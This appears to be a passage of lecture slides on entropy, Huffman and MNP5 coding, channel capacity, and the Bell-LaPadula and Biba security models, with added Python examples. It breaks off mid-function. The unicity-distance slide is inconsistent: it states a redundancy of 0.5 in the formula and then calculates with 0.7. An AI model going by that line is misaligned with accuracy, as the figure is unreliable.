Data commonly transferred digitally
Trade-off between bandwidth, accuracy of any signal
Information theory
The term information is commonly understood. Consider the following two sentences:
1. The sun will rise tomorrow.
2. The Fiji rugby team will win against the All Blacks (New Zealand rugby team) the next time they play.
Question: Which sentence contains the most information?
Information theory
Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, Temperature today is OK, ...
... total information here is close to zero!
?
More information means less predictable
Less information means more predictable
Information theory
Nyquist (1924) and Hartley (1928) laid the foundations:
Hartley showed that the information content is proportional to the logarithm of the number of possible messages. Integers between 1 and n need $\log_2 n$ bits.
Shannon developed a mathematical treatment of communication and information in an important paper at
http://cm.bell-labs.com/cm/ms/what/shannonday/paper.html
Information theory model
[Figure: the communication model: Information Source → Transmitter → Channel → Receiver → Destination (or sink), with a Noise Source feeding into the Channel]
The relevance of Shannon to secrecy is in another important paper at
http://www.cs.ucla.edu/~jkong/research/security/shannon.html
Entropy
In our communication model, the units of transmission are called messages, constructed from an alphabet of (say) n symbols $x \in \{x_1, \ldots, x_n\}$, each with a probability of transmission $P_x$.
We associate with each symbol x a quantity $H_x$ which is a measure of the information associated with that symbol.

$$H_x = P_x \log_2 \frac{1}{P_x}$$
Entropy
$$H_x = P_x \log_2 \frac{1}{P_x}$$

If the probability of occurrence of each symbol is the same, we can derive Hartley’s result, that the average amount of information transmitted in a single symbol (the source entropy) is

$$H(X) = \log_2 n$$

where X is a label referring to each of the source symbols $x_1, \ldots, x_n$.
Entropy units
Our units for entropy can be bits/second or bits/symbol, and we also sometimes use unit-less relative entropy measures (relative to the entropy of the system if all symbols were equally likely).
Entropy - same probability
| Symbols | Entropy of each symbol | Bits needed |
|---|---|---|
| 2 | $H_x = \frac{1}{2}\log_2 2 = \frac{1}{2}$ | $2 \cdot \frac{1}{2} = 1$ |
| 4 | $H_x = \frac{1}{4}\log_2 4 = \frac{1}{2}$ | $4 \cdot \frac{1}{2} = 2$ |
| 8 | $H_x = \frac{1}{8}\log_2 8 = \frac{3}{8}$ | $8 \cdot \frac{3}{8} = 3$ |
| 16 | $H_x = \frac{1}{16}\log_2 16 = \frac{4}{16}$ | $16 \cdot \frac{4}{16} = 4$ |
| 21 | $H_x = \frac{1}{21}\log_2 21 = \frac{4.39}{21}$ | $21 \cdot \frac{4.39}{21} = 4.39$ |
Entropy - different probability
However, if the probability of occurrence of each symbol is not the same, we derive the following result, that the source entropy is

$$H(X) = \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}}$$

Shannon’s paper shows that H determines the channel capacity required to transmit the desired information with the most efficient coding scheme.
Entropy - different probability
If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is

$$\begin{aligned} H(X) &= \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}} \\ &= \log_2 1 + 0 \cdot \log_2 0 \\ &= 0 \text{ bits/symbol} \end{aligned}$$
Entropy - different probability
If we were transmitting a sequence of letters A, B, C, D, E and F with probabilities $\frac{1}{2}, \frac{1}{4}, \frac{1}{16}, \frac{1}{16}, \frac{1}{16}$ and $\frac{1}{16}$, the entropy for the system is

$$\begin{aligned} H(X) &= \frac{1}{2}\log_2 2 + \frac{1}{4}\log_2 4 + \frac{4}{16}\log_2 16 \\ &= 0.5 + 0.5 + 1.0 \\ &= 2 \text{ bits/symbol} \end{aligned}$$
Encoding the letters
A fixed size 3-bit code, and then a more complex code:
| Symbol | 3-bit code | Complex code |
|---|---|---|
| A | 000 | 0 |
| B | 001 | 10 |
| C | 010 | 1100 |
| D | 011 | 1101 |
| E | 100 | 1110 |
| F | 101 | 1111 |
Analysis of encoding
The average length of the binary digits needed to encode a typical sequence of symbols using the 3-bit code is

$$\begin{aligned} L(X) &= \sum_{i=1}^{n} P_{x_i} \cdot \mathrm{sizeof}(x_i) \\ &= \frac{1}{2} \cdot 3 + \frac{1}{4} \cdot 3 + \frac{4}{16} \cdot 3 \\ &= 1.5 + 0.75 + 0.75 \\ &= 3 \text{ bits/symbol} \end{aligned}$$
Analysis of encoding
The average length of the binary digits needed to encode a typical sequence of symbols using the complex encoding is

$$\begin{aligned} L(X) &= \sum_{i=1}^{n} P_{x_i} \cdot \mathrm{sizeof}(x_i) \\ &= \frac{1}{2} \cdot 1 + \frac{1}{4} \cdot 2 + \frac{4}{16} \cdot 4 \\ &= 0.5 + 0.5 + 1.0 \\ &= 2 \text{ bits/symbol} \end{aligned}$$

i.e. it is more efficient, averaging only 2 bits for each symbol transmitted.
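The entropy and average-code-length calculations from the preceding slides, worked in Python. This is an added example, not code from the lecture notes: the source (letters A to F with probabilities 1/2, 1/4, 1/16, 1/16, 1/16, 1/16) and the two codes are the slides’ own values, while the function names are mine. It also checks the property the slides rely on without naming it, that the variable-length code is prefix-free, which is what lets a receiver split a bit stream into codewords without separators.

```python
import math
from fractions import Fraction

# The source from the slides: six letters with probabilities 1/2, 1/4 and four of 1/16.
SOURCE = {
    "A": Fraction(1, 2), "B": Fraction(1, 4), "C": Fraction(1, 16),
    "D": Fraction(1, 16), "E": Fraction(1, 16), "F": Fraction(1, 16),
}
# The two codes from the "Encoding the letters" slide.
FIXED_CODE = {"A": "000", "B": "001", "C": "010", "D": "011", "E": "100", "F": "101"}
COMPLEX_CODE = {"A": "0", "B": "10", "C": "1100", "D": "1101", "E": "1110", "F": "1111"}


def symbol_information(p):
    """H_x = P_x log2(1/P_x). Because y log2(1/y) -> 0 as y -> 0, a symbol with
    P_x = 0 contributes nothing (the point of the lecture's correction slide)."""
    p = float(p)
    return 0.0 if p == 0.0 else p * math.log2(1.0 / p)


def source_entropy(probs):
    """H(X) = sum_i P_xi log2(1/P_xi), in bits/symbol."""
    if abs(sum(float(p) for p in probs.values()) - 1.0) > 1e-9:
        raise ValueError("symbol probabilities must sum to 1")
    return sum(symbol_information(p) for p in probs.values())


def hartley_entropy(n):
    """Equiprobable symbols: H(X) = log2 n."""
    return math.log2(n)


def average_code_length(probs, code):
    """L(X) = sum_i P_xi * sizeof(x_i), in bits/symbol."""
    return sum(float(probs[s]) * len(code[s]) for s in probs)


def is_prefix_free(code):
    """No codeword is a prefix of another (and none repeats), so a bit stream can be
    split into codewords without separators. This is what makes the complex code usable."""
    words = list(code.values())
    if len(set(words)) != len(words):
        return False
    return not any(a != b and b.startswith(a) for a in words for b in words)


def encode(message, code):
    return "".join(code[s] for s in message)


def decode(bits, code):
    """Greedy decoding: emit a symbol as soon as the buffered bits form a codeword.
    Correct only for a prefix-free code, so that is checked first."""
    if not is_prefix_free(code):
        raise ValueError("code is not prefix-free; greedy decoding is ambiguous")
    by_word = {w: s for s, w in code.items()}
    out, buf = [], ""
    for b in bits:
        buf += b
        if buf in by_word:
            out.append(by_word[buf])
            buf = ""
    if buf:
        raise ValueError("trailing bits do not form a codeword")
    return "".join(out)


if __name__ == "__main__":
    print("H(X) =", source_entropy(SOURCE), "bits/symbol")
    print("L(X) 3-bit code =", average_code_length(SOURCE, FIXED_CODE))
    print("L(X) complex code =", average_code_length(SOURCE, COMPLEX_CODE))
    stream = encode("FACADE", COMPLEX_CODE)
    print("FACADE ->", stream, "->", decode(stream, COMPLEX_CODE))
```

With the slides’ probabilities the complex code’s average length equals the source entropy (2 bits/symbol), which is the lower bound Shannon’s result places on any coding scheme; the 3-bit code spends a full extra bit per symbol.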
Entropy and transmission rate
If our source was transmitting 0 and 1 bits with equal probability, but the received data was corrupted 50% of the time, we might reason that our rate r(X) of information transmission was 0.5, because half of our data is getting through correctly.
[Figure: the communication model: Information Source → Transmitter → Channel → Receiver → Destination (or sink), with a Noise Source feeding into the Channel]
However, a better argument is to consider the difference between the entropy of the source and the conditional entropy of the received data:

$$r(X) = H(X) - H(X \mid y)$$

where $H(X \mid y)$ is the conditional entropy of the received data.
Entropy and transmission rate
$$\begin{aligned} H(X \mid y) &= 0.5 \cdot \log_2 2 + 0.5 \cdot \log_2 2 \\ &= 1 \end{aligned}$$

and H(X) = 1 (shown before), so

$$\begin{aligned} r(X) &= H(X) - H(X \mid y) \\ &= 0 \text{ bits/symbol} \end{aligned}$$

This is a much better measure of the amount of information transmitted.
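The transmission-rate argument above, as an added Python example that is not from the notes. It models the slides’ scenario as a binary symmetric channel (my assumption: each bit is flipped independently with a fixed error rate) and computes $r(X) = H(X) - H(X \mid y)$ for any error rate, so it also shows the two cases the slides do not spell out: an error-free channel conveys the full 1 bit/symbol, and a channel that inverts every bit conveys just as much, since the receiver can undo a deterministic corruption. Only the 50% case, where the received bit is independent of the sent one, gives zero.

```python
import math


def entropy(probs):
    """H = sum p log2(1/p) over a probability vector; the p = 0 terms are 0."""
    return sum(p * math.log2(1.0 / p) for p in probs if p > 0)


def joint_distribution(p_one, error_rate):
    """P(x, y) for a source emitting 1 with probability p_one, sent over a binary
    symmetric channel that flips each bit with probability error_rate (assumed model)."""
    p_x = {0: 1.0 - p_one, 1: p_one}
    joint = {}
    for x in (0, 1):
        for y in (0, 1):
            p_y_given_x = 1.0 - error_rate if x == y else error_rate
            joint[(x, y)] = p_x[x] * p_y_given_x
    return joint


def conditional_entropy(joint):
    """H(X | y): the entropy of the transmitted symbol x given the received
    symbol y, averaged over y."""
    p_y = {0: 0.0, 1: 0.0}
    for (x, y), p in joint.items():
        p_y[y] += p
    h = 0.0
    for y in (0, 1):
        if p_y[y] == 0.0:
            continue                      # y is never received
        p_x_given_y = [joint[(x, y)] / p_y[y] for x in (0, 1)]
        h += p_y[y] * entropy(p_x_given_y)
    return h


def naive_rate(error_rate):
    """The slide's first guess: the fraction of bits that arrive unchanged."""
    return 1.0 - error_rate


def transmission_rate(p_one, error_rate):
    """r(X) = H(X) - H(X | y), in bits/symbol."""
    h_x = entropy([1.0 - p_one, p_one])
    return h_x - conditional_entropy(joint_distribution(p_one, error_rate))


if __name__ == "__main__":
    for err in (0.0, 0.1, 0.5, 1.0):
        print(f"error rate {err:.1f}: naive {naive_rate(err):.2f}, "
              f"r(X) = {transmission_rate(0.5, err):.3f} bits/symbol")
```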
Redundancy
The ratio of the entropy of a source H(X) to what it would be if the symbols had equal probabilities H′(X), is called the relative entropy. We use the notation $H_r(X)$, and

$$H_r(X) = \frac{H(X)}{H'(X)}$$

The redundancy of the source is $1 - H_r(X)$

$$R(X) = 1 - H_r(X)$$
Redundancy
If we look at English text a symbol at a time¹, the redundancy is about 0.7.
This indicates that it should be simple to compress English text by about 70%.
This sort of redundancy is a unitless relative redundancy.
¹ That is, without considering letter sequences.
Unicity distance
Defined by Shannon: an approximation to the amount of ciphertext such that the sum of the source entropy and the encryption key entropy is the same as the number of ciphertext bits used.
Ciphertexts longer than this have only one meaningful decryption.
Ciphertexts shorter than this may have more than one meaningful decryption (and hence be stronger, as a hacker will not know which one is correct).
Unicity distance
The longer the unicity distance, the better the cryptosystem.
Unicity distance U is the entropy of the key divided by the redundancy of the source, and is approximately

$$U \approx \frac{\log_2 K}{R \log_2 P}$$

(K is the key size, R is the redundancy, P is the number of symbols).
Unicity distance
26 letter alphabet, and 26! keys

$$\begin{aligned} U &\approx \frac{\log_2 26!}{0.5 \log_2 26} \\ &\approx \frac{88}{0.7 \cdot 4.7} \\ &\approx 27 \end{aligned}$$

So given a ciphertext of 27 symbols, a unique decoding is possible.
Unicity distance
In general
Longer key length, then longer unicity distance.
Redundancy is inversely proportional to unicity distance.
It estimates the minimum amount of ciphertext for which there is only a single plaintext solution on doing a brute force attack...
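Relative entropy, redundancy and unicity distance from the slides above, as an added Python example that is not part of the notes. It uses the slides’ own values: the A to F source for the redundancy calculation, and a 26-letter alphabet with 26! keys and R = 0.7 (the redundancy of English given earlier) for the unicity distance, which reproduces the slides’ figure of about 27 symbols. Function names are mine; the zero-redundancy case, where the formula has no finite answer, is handled explicitly.

```python
import math


def entropy(probs):
    """H(X) = sum P log2(1/P); zero-probability symbols contribute 0."""
    return sum(p * math.log2(1.0 / p) for p in probs if p > 0)


def relative_entropy(probs):
    """Hr(X) = H(X) / H'(X), with H'(X) = log2 n the entropy if all n symbols
    were equally likely. Unit-less, between 0 and 1."""
    return entropy(probs) / math.log2(len(probs))


def redundancy(probs):
    """R(X) = 1 - Hr(X)."""
    return 1.0 - relative_entropy(probs)


def unicity_distance(num_keys, source_redundancy, num_symbols):
    """U ~ log2 K / (R log2 P): the ciphertext length, in symbols, beyond which a
    search over all keys is expected to leave only one meaningful plaintext.
    With no redundancy every decryption looks meaningful, so U is unbounded."""
    if source_redundancy <= 0.0:
        return math.inf
    return math.log2(num_keys) / (source_redundancy * math.log2(num_symbols))


# Values taken from the slides.
LETTER_SOURCE = [1 / 2, 1 / 4, 1 / 16, 1 / 16, 1 / 16, 1 / 16]
ENGLISH_REDUNDANCY = 0.7
SUBSTITUTION_KEYS = math.factorial(26)   # 26! keys for a 26-letter alphabet


def simple_substitution_unicity():
    """The slides' worked case: 26! keys, 26 symbols, English redundancy."""
    return unicity_distance(SUBSTITUTION_KEYS, ENGLISH_REDUNDANCY, 26)


if __name__ == "__main__":
    print("H(X) for A..F source:", entropy(LETTER_SOURCE), "bits/symbol")
    print("relative entropy:", round(relative_entropy(LETTER_SOURCE), 4))
    print("redundancy:", round(redundancy(LETTER_SOURCE), 4))
    print("unicity distance, 26! keys, R = 0.7:", round(simple_substitution_unicity(), 1))
```

Doubling the key entropy doubles U for the same source, while a source with zero redundancy (every symbol equally likely and independent) gives an infinite U: that is the limiting case in which no amount of ciphertext singles out one plaintext.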
Chapter 5
Lecture 5 - Preliminaries
Last session
• Physical preliminaries
• Entropy
This session
• Channel properties
• Entropy
• Models
Hugh’s bigger mistakes...
Incorrect
[Plot: components of amplitude 1.0 at f, 0.333 at 3f and 0.2 at 5f]
The plot is frequency vs time. (Frequency domain).
Correct
[Plot: components of amplitude 1.0 at f, 0.333 at 3f and 0.2 at 5f]
The plot is amplitude vs frequency. (Frequency domain).
Incorrect
If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is

$$\begin{aligned} H(X) &= \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}} \\ &= \log_2 1 + 0 \cdot \log_2 0 \\ &= 0 \text{ bits/symbol} \end{aligned}$$
Correct
If we had a source emitting two symbols, 0 and 1, with probabilities of 1 and 0, then the entropy of the source is

$$\begin{aligned} H(X) &= \sum_{i=1}^{n} P_{x_i} \log_2 \frac{1}{P_{x_i}} \\ &= 1 \cdot \log_2 1 + 0 \cdot \log_2 \frac{1}{0} \\ &= 0 \text{ bits/symbol} \end{aligned}$$

Note that $\lim_{y \to 0} y \log_2 \frac{1}{y} = 0$
Page 46 of notes
The first two equations that begin H(X) should begin with L(X).

$$\begin{aligned} L(X) &= \sum_{i=1}^{n} P_{x_i} \cdot \mathrm{sizeof}(x_i) \\ &= \frac{1}{2} \cdot 3 + \frac{1}{4} \cdot 3 + \frac{4}{16} \cdot 3 \\ &= 1.5 + 0.75 + 0.75 \\ &= 3 \text{ bits/symbol} \end{aligned}$$
1/2 of data through correctly...
Received data is corrupted 50% of the time:
[Figure: the transmitted bit stream before the channel and the received stream after it]
Convolution
Applet to do convolution: http://www.cs.brown.edu/exploratories/freeSoftware/repository/edu/brown/cs/exploratories/applets/convolution/convolution java browser.html
This session
• Channel properties
• Entropy
• Security models
Shannon and Nyquist
ReceiverSourceInformation
TransmitterDestination
Channel
SourceNoise
(or sink)
Maximum BPS = W log2(1 + SN ) bits/sec
Shannon and Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz and a S/N of 30 dB (a power ratio of 1000:1, close to 1024:1 = 2^10):

D = 3000 · log2(1025)
  ≈ 3000 · 10
  ≈ 30000 bps

This is a typical maximum bit rate achievable over the telephone network.
Nyquist
The maximum data rate over a channel of limited bandwidth W, using V discrete signal levels, is:

Maximum data rate = 2W log2 V bits/sec

For example, two-level data cannot be transmitted over the telephone network faster than 6,000 bps, because the bandwidth of the telephone channel is only about 3,000 Hz.
Nyquist example
If we had a telephone system with a bandwidth of 3,000 Hz and used 256 signal levels:

D = 2 · 3000 · log2 256
  = 6000 · 8
  = 48000 bps

Note that this exceeds the 30000 bps Shannon figure above. The Nyquist rate is the noise-free limit; once noise is present the Shannon capacity binds, and at 30 dB it only allows about √(1 + S/N) ≈ 32 distinguishable levels, not 256.

In these equations, the assumption is that the relative entropies of the signal and noise are a maximum (that they are random).
This session
• Channel properties
• Entropy
• Security models
Maximum entropy
In practical systems, signals rarely have maximum entropy, and we can do better: there may be methods to compress the data [2].

[2] Note: we must also differentiate between lossy and lossless compression schemes. A signal with an entropy of 0.5 bits per bit cannot be compressed more than 2:1 unless you use a lossy compression scheme. JPEG and wavelet compression schemes can achieve huge data size reductions without visible impairment of images, but the restored images are not the same as the original ones, they just look the same. The lossless compression schemes used in PkZip and gzip (Deflate) or GIF files (LZW) cannot achieve compression ratios as high as those found in JPEG.
Huffman encoding
An immediate question of interest is "What is the minimum length bit string that may be used to compress a string of symbols?".

The Huffman encoding minimizes the bit length given the frequency of occurrence of each symbol [3]. The resultant bit string in the best case will be the length predicted from the calculation of the source entropy. That best case is reached exactly when every symbol probability is a power of two; in general Huffman's average code length lies within one bit per symbol of the entropy.

[3] Note that it presupposes knowledge about these frequencies.
Huffman encoding
How can we get knowledge about the frequency of (say) the letters in the English language?

(answer) - we read Snapple bottle tops...
Huffman encoding
(Figure: Huffman tree with 0 on the left branch and 1 on the right. E and T sit at depth 2; A, O, N and S sit at depth 3, giving the codes tabulated on the next slide.)

Less common characters use longer bit strings.
Huffman encoding
Our algorithm for encoding is simple: we calculate the tree encoding knowing the frequency of each letter:

Symbol  Coding
E       00
T       10
A       010
O       011
N       110
S       111

To decode, traverse the tree taking a left or right path according to each bit. The leaf reached holds our symbol, and because no codeword is a prefix of another, no separators are needed between symbols.
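As an added example (not code from the lecture notes), the following Python builds a Huffman code from a frequency table, encodes and decodes with it, and compares the average code length L(X) against the source entropy H(X). The frequency table is constructed so that it matches the L(X) slide earlier: one symbol of probability 1/2, one of 1/4 and four of 1/16, which a fixed 3-bit code sends at 3 bits/symbol while Huffman reaches the entropy of 2 bits/symbol.

```python
# Added example, not from the CS3235 notes. Huffman coding from a symbol
# frequency table, with L(X) compared against H(X). FREQ is a constructed
# table (probabilities 1/2, 1/4 and four of 1/16); the symbol names E, T, A,
# O, N, S are those used on the slides.
import heapq
import itertools
import math


def entropy(freq):
    """Shannon entropy H(X) in bits/symbol for a frequency (or probability) table."""
    total = sum(freq.values())
    return -sum(f / total * math.log2(f / total) for f in freq.values() if f)


def huffman_code(freq):
    """Build a prefix code {symbol: bitstring} by repeatedly merging the two
    least frequent subtrees. A counter breaks ties so heapq never compares
    tree nodes with each other."""
    counter = itertools.count()
    heap = [(f, next(counter), sym) for sym, f in freq.items()]
    heapq.heapify(heap)
    if len(heap) == 1:                      # degenerate single-symbol source
        return {heap[0][2]: "0"}
    while len(heap) > 1:
        f1, _, left = heapq.heappop(heap)
        f2, _, right = heapq.heappop(heap)
        heapq.heappush(heap, (f1 + f2, next(counter), (left, right)))
    code = {}

    def walk(node, prefix):
        if isinstance(node, tuple):         # internal node: 0 = left, 1 = right
            walk(node[0], prefix + "0")
            walk(node[1], prefix + "1")
        else:
            code[node] = prefix
    walk(heap[0][2], "")
    return code


def average_length(freq, code):
    """L(X) = sum_i P(x_i) * sizeof(x_i), in bits/symbol."""
    total = sum(freq.values())
    return sum(f / total * len(code[sym]) for sym, f in freq.items())


def encode(text, code):
    return "".join(code[ch] for ch in text)


def decode(bits, code):
    """Walk the prefix code bit by bit; a complete codeword emits a symbol."""
    reverse = {v: k for k, v in code.items()}
    out, cur = [], ""
    for b in bits:
        cur += b
        if cur in reverse:
            out.append(reverse[cur])
            cur = ""
    if cur:
        raise ValueError("trailing bits do not form a codeword")
    return "".join(out)


# Constructed source: E occurs half the time, T a quarter, the rest 1/16 each.
FREQ = {"E": 8, "T": 4, "A": 1, "O": 1, "N": 1, "S": 1}
# A fixed-length 3-bit code for the same six symbols, for comparison.
FIXED = {sym: format(i, "03b") for i, sym in enumerate(FREQ)}

if __name__ == "__main__":
    code = huffman_code(FREQ)
    print("codes:", code)
    print("H(X)        =", entropy(FREQ), "bits/symbol")
    print("L(X) fixed  =", average_length(FREQ, FIXED), "bits/symbol")
    print("L(X) Huffman=", average_length(FREQ, code), "bits/symbol")
    msg = "TEASEONTE"
    bits = encode(msg, code)
    print(msg, "->", bits, "->", decode(bits, code))
```

Because every probability here is a power of two, Huffman's L(X) equals H(X) exactly; with less convenient frequencies it would land somewhere in the interval [H(X), H(X) + 1).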
Case study - MNP5 and V.42bis
MNP5 and V.42bis are compression schemes commonly used on modems.

MNP5 suffers from the unfortunate property that it will expand data with maximum or near-maximum entropy (instead of compressing it).

V.42bis does not have this property: it uses a large dictionary, and will not try to compress an already compressed stream.
MNP5
MNP5 uses two different compression methods, switching between them as appropriate. The methods are:

• Adaptive frequency encoding

• Run-length encoding

Run-length encoding sends each byte together with a byte count value, and so doubles the size of a data stream with maximum entropy, where almost every run has length one.
Adaptive frequency encoding
3-bit header   Body size   Total code size   Number of codewords
000            1 bit       4 bits            2
001            1 bit       4 bits            2
010            2 bits      5 bits            4
011            3 bits      6 bits            8
100            4 bits      7 bits            16
101            5 bits      8 bits            32
110            6 bits      9 bits            64
111            7 bits      10 bits           128

3/4 of our codewords (the 192 with 9- or 10-bit codes) are longer than the 8 bits an uncoded byte would take, so the scheme only pays off when the symbol frequencies are skewed enough for the short codes to dominate.
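As an added example (not code from the lecture notes), the following Python implements the two MNP5 building blocks as the slides describe them and measures both on high- and low-entropy input. The run-length scheme is the slide's simplified form (every run sent as a byte plus a count), the adaptive frequency code lengths follow the 3-bit header table above, and the "never send an expanded stream" guard stands in for the V.42bis behaviour mentioned earlier. Real MNP5 framing differs in detail, and all inputs are constructed.

```python
# Added example, not from the CS3235 notes. Simplified MNP5 run-length
# encoding and adaptive-frequency code lengths, measured on constructed
# high- and low-entropy inputs. The header/body table is the one on the
# slide; the RLE framing and the expansion guard are simplifications.
import math
import random
from collections import Counter


def rle_encode(data):
    """Slide-style RLE: emit (byte, run length) pairs, run length capped at 255."""
    out = bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        n = 1
        while i + n < len(data) and data[i + n] == b and n < 255:
            n += 1
        out += bytes((b, n))
        i += n
    return bytes(out)


def rle_decode(enc):
    out = bytearray()
    for b, n in zip(enc[::2], enc[1::2]):
        out += bytes([b]) * n
    return bytes(out)


def afe_code_length(rank):
    """Total code size (3-bit header + body) for the symbol ranked `rank` by
    frequency, following the table: ranks 0-3 cost 4 bits, 4-7 cost 5,
    8-15 cost 6, ..., 128-255 cost 10."""
    if rank < 4:
        return 4
    body = rank.bit_length() - 1
    return 3 + body


def afe_bits(data):
    """Bits needed to send `data` with codes assigned by frequency rank
    (the table is assumed to have adapted already)."""
    ranked = [b for b, _ in Counter(data).most_common()]
    rank = {b: i for i, b in enumerate(ranked)}
    return sum(afe_code_length(rank[b]) for b in data)


def entropy_bits_per_byte(data):
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def compress_with_guard(data):
    """Do what the slide credits V.42bis with: never send an expanded stream.
    Returns (mode, payload)."""
    enc = rle_encode(data)
    return ("rle", enc) if len(enc) < len(data) else ("raw", data)


if __name__ == "__main__":
    rng = random.Random(1)
    noisy = bytes(rng.randrange(256) for _ in range(4096))   # near-maximum entropy
    runs = b"\x00" * 2000 + b"\xff" * 2000 + b"abc" * 32       # low entropy
    for name, d in (("noisy", noisy), ("runs", runs)):
        print(name,
              "H=%.2f bits/byte" % entropy_bits_per_byte(d),
              "RLE x%.2f" % (len(rle_encode(d)) / len(d)),
              "AFE x%.3f" % (afe_bits(d) / (8 * len(d))),
              "guarded:", compress_with_guard(d)[0])
```

On a uniformly distributed byte stream the frequency code costs 2308/256 ≈ 9.02 bits per byte, a 13% expansion, and the slide-style RLE exactly doubles the stream; the guard falls back to sending the raw bytes in both cases.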
Further study
• Textbook Chapter 32

• Shannon's paper on secrecy systems at http://www.cs.ucla.edu/~jkong/research/security/shannon.html
This session
• Channel properties
• Entropy
• Security models
Preliminaries - security models
Definition: a range of formal policies for specifying the security of a system in terms of a (mathematical) model. We look at:

access control matrix

Bell-LaPadula

Biba

Clark-Wilson
Security model
Have a model
Determine properties
Verify implementations
Access control matrix
Rows of the matrix are subjects, columns are the objects f1, f2, f3, f4. The rights recorded, reading across each row, are:

s1: read, execute, execute
s2: write, read, execute
s3: read, write, execute
s4: read, write, read

s4 cannot read f1. But subjects may collude...
Bell-LaPadula, confidentiality
Military style, to assure confidentiality services.

Security levels in a (total) ordering formalize a policy which restricts information flow from a higher security level to a lower security level.

It prevents lower-level subjects from accessing higher-level objects.

Section 5.2 in textbook
Bell-LaPadula, levels
1. Top secret (T)
2. Secret (S)
3. Confidential (C)
4. Unclassified (U)

where T > S > C > U. Access operations are visualized using an access control matrix, and are drawn from {read, write}.
BLP security property
The clearance or classification of a subject s ∈ S or object o ∈ O is denoted L(s) = ls or L(o) = lo. We might then assume we can use this to construct a first simple security property:

• No read-up-1 (the simple security property): s can read o if and only if lo ≤ ls, and s has read access in the access control matrix.

This single property is insufficient to ensure the restriction we need for the security policy.
BLP Trojan Horse property
Consider the case when a low security subject creates a high security object (say a program) which, when run by a high security subject, reads a high security file and copies its contents to a low security one. This behaviour is commonly called a Trojan Horse. A second property is needed:

• No write-down-1 (the *-property): s can write o if and only if ls ≤ lo, and s has write access in the access control matrix.

These two properties can be used to enforce our security policy, but with a severe restriction. For example, how does any subject ever write down (declassify) without invalidating the security policy?
BLP extended
A security category c ∈ C is used to classify objects in the model, with any object belonging to a set of categories. Each pair (l, c) of a level and a set of categories is termed a security level, and the set of security levels forms a lattice.

Lattice - chapter 30 in textbook
BLP extended
We define a relation between security levels:

• The security level (l, c) dominates (l′, c′) (written (l, c) dom (l′, c′)) iff l′ ≤ l and c′ ⊆ c.

A subject s and an object o then each belong to one of these security levels.
BLP extended
The new properties are (writing s dom o for L(s) dom L(o)):

• No read-up-2: s can read o if and only if s dom o, and s has read access in the access control matrix.

• No write-down-2: s can write o if and only if o dom s, and s has write access in the access control matrix.
BLP security
A system is considered secure in the current state if all the current accesses are permitted by the two properties.

A transition from one state to the next is considered secure if it goes from one secure state to another secure state.

The basic security theorem (Theorem 5-2 in the textbook) states that if the initial state of a system is secure, and all state transitions are secure, then every reachable state of the system is secure.
BLP example
From textbook, p128:
DG UNIX uses access controls and BLP-like behaviour
BLP limits
BLP is a static model, not providing techniques for changing access rights or security levels [4], and there is an exploration and discussion of the limitations of this sort of security modelling in section 5.4 of the textbook.

However the model does demonstrate initial ideas on how to model, and how to build, security systems that are provably secure.

[4] You might want to explore the Harrison-Ruzzo-Ullman model for this capability.
Biba model, integrity
Trustworthiness of data and programs: assurance for integrity services.

Levels like clean or dirty (in reference to database entries).

The Biba model (chapter 6.2) is a kind of dual of Bell-LaPadula: integrity instead of confidentiality.
Biba levels
The integrity levels I are ordered as for the security levels.

Function i : O → I (i : S → I) returns the integrity level of an object (subject).
Biba properties
The properties/rules for the main (static) Biba model are:
• No read-down : s can read o iff i(s) ≤ i(o).
• No write-up : s can write o iff i(o) ≤ i(s).
• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
Biba - dynamic
Biba models can also handle dynamic integrity levels, where the level of a subject is reduced if it accesses an object at a lower level (in other words it has got dirty). The low-water-mark policies are:

• No write-up : s can write o iff i(o) ≤ i(s).

• Subject lowers : if s reads o then i′(s) = min(i(s), i(o)).

• No invoke-up : s1 can execute s2 iff i(s2) ≤ i(s1).
Biba - ring
Finally, we have a ring policy:

• All read : s can read o regardless.

• No write-up : s can write o if and only if i(o) ≤ i(s).

• No invoke-up : s1 can execute s2 if and only if i(s2) ≤ i(s1).

Each of these policies has an application in some area. Example in textbook, p155 (LOCUS OS).
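As an added example (not code from the lecture notes), the following Python is a small executable model of the rules on the preceding slides: the dom relation on (level, categories) labels, the BLP no-read-up-2 and no-write-down-2 checks against an access control matrix, the BLP notion of a secure state, and the Biba strict and low-water-mark rules. The levels U < C < S < T are the slides'; the categories, subjects, objects and the access control matrix are constructed.

```python
# Added example, not from the CS3235 notes. Executable BLP and Biba rules on
# a lattice of (level, categories) labels. Subjects, objects, categories and
# the access control matrix below are constructed for the example.
from dataclasses import dataclass

LEVELS = {"U": 0, "C": 1, "S": 2, "T": 3}


@dataclass(frozen=True)
class Label:
    level: str
    cats: frozenset

    def dom(self, other):
        """(l, c) dom (l', c') iff l' <= l and c' is a subset of c."""
        return LEVELS[other.level] <= LEVELS[self.level] and other.cats <= self.cats


def L(level, *cats):
    """The L(.) of the slides: build the security label of a subject or object."""
    return Label(level, frozenset(cats))


# Access control matrix, (subject, object) -> rights. Constructed.
ACM = {
    ("alice", "plan"): {"read", "write"},
    ("alice", "memo"): {"read", "write"},
    ("bob", "plan"): {"read", "write"},
    ("bob", "memo"): {"read", "write"},
}


def blp_can_read(subj, obj, label, acm=ACM):
    """No read-up-2: s may read o iff L(s) dom L(o) and the matrix grants read."""
    return label[subj].dom(label[obj]) and "read" in acm.get((subj, obj), set())


def blp_can_write(subj, obj, label, acm=ACM):
    """No write-down-2: s may write o iff L(o) dom L(s) and the matrix grants write."""
    return label[obj].dom(label[subj]) and "write" in acm.get((subj, obj), set())


def blp_state_secure(accesses, label, acm=ACM):
    """A state is secure if every current (subject, object, mode) access is
    permitted by both properties."""
    rule = {"read": blp_can_read, "write": blp_can_write}
    return all(rule[mode](s, o, label, acm) for s, o, mode in accesses)


# Biba, with integrity levels as plain integers (higher = more trustworthy).
def biba_can_read(subj, obj, ilevel):
    """No read-down: s may read o iff i(s) <= i(o)."""
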